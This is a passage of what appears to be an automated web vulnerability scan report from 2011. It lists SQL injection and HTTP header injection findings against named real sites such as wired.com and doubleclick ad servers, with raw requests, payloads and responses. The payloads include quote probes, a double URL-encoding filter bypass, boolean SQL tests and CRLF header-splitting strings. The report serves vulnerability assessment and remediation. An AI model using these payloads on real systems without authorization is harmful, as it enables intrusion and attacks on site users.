GET /msn.whitepages.com' HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 20123

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
<br />
error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND rating>
...[SNIP]...

Request 2

GET /msn.whitepages.com'' HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 29736

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

1.7. http://www.websitedescription.com/msn.whitepages.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.websitedescription.com
Path:   /msn.whitepages.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /msn.whitepages.com?1'=1 HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 14020

<br />
<b>Warning</b>: Invalid argument supplied for foreach() in <b>/home/websited/public_html/libraries/Bing/BingData.php</b> on line <b>25</b><br />
<?php include 'include.php'; ?>

<!DOCTYPE html
...[SNIP]...
<br />
error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND is_approved = '1' AND rating>
...[SNIP]...

Request 2

GET /msn.whitepages.com?1''=1 HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 23460

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

1.8. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/login?1%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache/2.0.52 (Red Hat)
Content-Length: 403
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /user/login?1%2527%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login?1%2527%2527=1
Content-Length: 87
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:33:10 GMT
Connection: close
Set-Cookie: JSESSIONID=acbgrU5qBQJolc2__261s; path=/

The URL has moved <a href="https://secure.wired.com/user/login?1%2527%2527=1">here</a>

1.9. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /video/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 15:25:26 GMT
Date: Wed, 12 Jan 2011 15:20:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_672363149001_Honda-Corp-Featured-Video-80x60.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001">Into the Unknown</a></li>
        <li class="videoDesc">What drives humans to explore? Is the human brain an uncharted frontier unto itself? Join the inquisitive minds at Honda and journey into the unknown with climbers, divers, scientists, astronauts, engineers and other modern-day explorers.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>
var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";
...[SNIP]...

Request 2

GET /video/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=292
Expires: Wed, 12 Jan 2011 15:25:37 GMT
Date: Wed, 12 Jan 2011 15:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_719323216001_IBM-WATSON-T.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001">IBM and the Jeopardy! Challenge</a></li>
        <li class="videoDesc">An IBM supercomputer named Watson will compete against Jeopardy! champions Ken Jennings and Brad Rutter this February. Watch the trailer.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>
var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";
var bc_gBaseURL = "http://www.wired.com/video/";
var bc_gTitl
...[SNIP]...

2. HTTP header injection
There are 20 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93020%0d%0acc1771f935d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93020%0d%0acc1771f935d;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613? HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93020
cc1771f935d
;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613:
Date: Wed, 12 Jan 2011 03:04:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload fba57%0d%0a1bd6f7ca3f9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&fba57%0d%0a1bd6f7ca3f9=1 HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&fba57
1bd6f7ca3f9
=1&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 03:19:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:04:19 GMT
Server: GFE/2.0
Content-Type: text/html


2.3. http://ad.doubleclick.net/activity [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 7bb44%0d%0a6d1fe61d04d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?7bb44%0d%0a6d1fe61d04d HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?7bb44
6d1fe61d04d
&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 03:19:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:04:03 GMT
Server: GFE/2.0
Content-Type: text/html


2.4. http://ad.doubleclick.net/ad/wiredcom.dart/threatlevel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2d140%0d%0a9de548d54f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2d140%0d%0a9de548d54f/wiredcom.dart/threatlevel;kw=threatlevel;kw=blogs;kw=bottom;tile=5;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2d140
9de548d54f
/wiredcom.dart/threatlevel%3Bkw%3Dthreatlevel%3Bkw%3Dblogs%3Bkw%3Dbottom%3Btile%3D5%3Bsz%3D728x90%3Bord%3D123456789:
Date: Wed, 12 Jan 2011 03:26:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28b5e%0d%0af9bfe52e968 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28b5e%0d%0af9bfe52e968/wiredcom.dart/threatlevel;sz=728x90;tile=1;dcopt=ist;kw=01;kw=2011;kw=blogs;kw=threatlevel;kw=top;kw=wikileaks-sunken-treasure;!c=top;ord=3553839230444282.5; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/28b5e
f9bfe52e968
/wiredcom.dart/threatlevel%3Bsz%3D728x90%3Btile%3D1%3Bdcopt%3Dist%3Bkw%3D01%3Bkw%3D2011%3Bkw%3Dblogs%3Bkw%3Dthreatlevel%3Bkw%3Dtop%3Bkw%3Dwikileaks-sunken-treasure%3B%21c%3Dtop%3Bord%3D3553839230444282.5%3B:
Date: Wed, 12 Jan 2011 03:03:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c041%0d%0a26bb86d7910 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c041%0d%0a26bb86d7910/wiredcom.dart/threatlevel;kw=threatlevel;kw=blogs;kw=bottom;tile=5;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c041
26bb86d7910
/wiredcom.dart/threatlevel%3Bkw%3Dthreatlevel%3Bkw%3Dblogs%3Bkw%3Dbottom%3Btile%3D5%3Bsz%3D728x90%3Bord%3D123456789:
Date: Wed, 12 Jan 2011 03:26:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.uk.doubleclick.net/ad/reg.misc.4159/textlink [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /ad/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14c3a%0d%0adfa9ca18363 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14c3a%0d%0adfa9ca18363/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14c3a
dfa9ca18363
/reg.misc.4159/textlink%3Bdcove%3Dd%3Btlid%3D222964969%3Bsz%3D1x1%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:23:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 645ec%0d%0a4b755942ebf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /645ec%0d%0a4b755942ebf/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/645ec
4b755942ebf
/reg.misc.4159/textlink%3Bdcove%3Dd%3Btlid%3D222964969%3Bsz%3D1x1%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:03:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.security.4159/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6ff1d%0d%0af780d4232ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6ff1d%0d%0af780d4232ac/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6ff1d
f780d4232ac
/reg.security.4159/front%3Btile%3D1%3Bdcove%3Dd%3Bcta%3D0%3Bctb%3D0%3Bctc%3Dredesign%3Bsc%3D1%3Bcid%3D%3Btest%3D%3Bpid%3D111484%3Bpf%3D0%3Bkw%3Dopen%20source%3Bkw%3Dencryption%3Bkw%3Dcryptography%3Bkw%3Dsoftware%3Bkw%3Dexport%20administration%20regulations%3Bkw%3Dbureau%20of%20industry%20and%20security%3Bcp%3D0%3Bvc%3Dsec.front%3Bpos%3Dtop%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D67176:
Date: Wed, 12 Jan 2011 03:03:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.uk.doubleclick.net/imp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /imp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39898%0d%0a43e3dfa8798 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39898%0d%0a43e3dfa8798;v7;j;233879919;0-0;0;13500656;0/0;39869669/39887456/1;;~okv=;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;~cs=s%3fhttp://regmedia.co.uk/2007/09/13/tp.gif HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39898
43e3dfa8798
;v7;j;233879919;0-0;0;13500656;0/0;39869669/39887456/1%3B%3B%7Eokv%3D%3Btile%3D1%3Bdcove%3Dd%3Bcta%3D0%3Bctb%3D0%3Bctc%3Dredesign%3Bsc%3D1%3Bcid%3D%3Btest%3D%3Bpid%3D111484%3Bpf%3D0%3Bkw%3Dopen%20source%3Bkw%3Dencryption%3Bkw%3Dcryptography%3Bkw%3Dsoftware%3Bkw%3Dexport%20administration%20regulations%3Bkw%3Dbureau%20of%20industry%20and%20security%3Bcp%3D0%3Bvc%3Dsec.front%3B:
Date: Wed, 12 Jan 2011 03:03:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.uk.doubleclick.net/jump/reg.misc.4159/textlink [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /jump/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7941d%0d%0a560604139b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7941d%0d%0a560604139b0/reg.misc.4159/textlink HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7941d
560604139b0
/reg.misc.4159/textlink:
Date: Wed, 12 Jan 2011 03:22:20 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.uk.doubleclick.net/jump/reg.security.4159/front [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /jump/reg.security.4159/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82d2a%0d%0a2431e9af5a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

